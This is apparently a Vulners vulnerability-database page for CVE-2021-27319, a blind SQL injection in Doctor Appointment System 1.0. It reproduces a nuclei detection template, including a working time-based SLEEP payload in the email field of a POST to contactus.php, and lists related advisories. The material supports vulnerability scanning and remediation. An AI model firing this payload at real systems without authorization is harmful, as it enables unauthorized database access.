Lucene search
K

Doctor Appointment System 1.0 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Doctor Appointment System 1.0 - SQL Injection allows unauthenticated attacker to insert malicious SQL queries via the email parameter, potentially leading to unauthorized data access, leakage, or manipulation. Upgrade to mitigate the vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Doctor Appointment System 1.0 Blind SQL Injection Vulnerability
3 Mar 202100:00
zdt
Circl
CVE-2021-27319
6 May 202317:42
circl
CNNVD
Sourcecodesterk Doctor Appointment System SQL注入漏洞
3 Mar 202100:00
cnnvd
CNVD
Doctor Appointment System SQL Injection Vulnerability (CNVD-2021-22959)
25 Mar 202100:00
cnvd
CVE
CVE-2021-27319
24 Mar 202113:45
cve
Cvelist
CVE-2021-27319
24 Mar 202113:45
cvelist
NVD
CVE-2021-27319
24 Mar 202114:15
nvd
OSV
CVE-2021-27319
24 Mar 202114:15
osv
Packet Storm
Doctor Appointment System 1.0 Blind SQL Injection
3 Mar 202100:00
packetstorm
Prion
Sql injection
24 Mar 202114:15
prion
Rows per page
id: CVE-2021-27319

info:
  name: Doctor Appointment System 1.0 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
    - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27319
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-27319
    cwe-id: CWE-89
    epss-score: 0.07826
    epss-percentile: 0.93961
    cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: doctor_appointment_system_project
    product: doctor_appointment_system
  tags: time-based-sqli,cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /contactus.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        firstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 500'
          - 'contains(body, "Medical Management System")'
        condition: and
# digest: 4b0a00483046022100bc5487a47c09a0cfa0259cabdb2a14af0fc8ca139d7c60fca4afc8110b665af90221009ec1cce961230c3fbadacadcad547215592213ad22f42d2531ea6b3473f459d9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.07826
29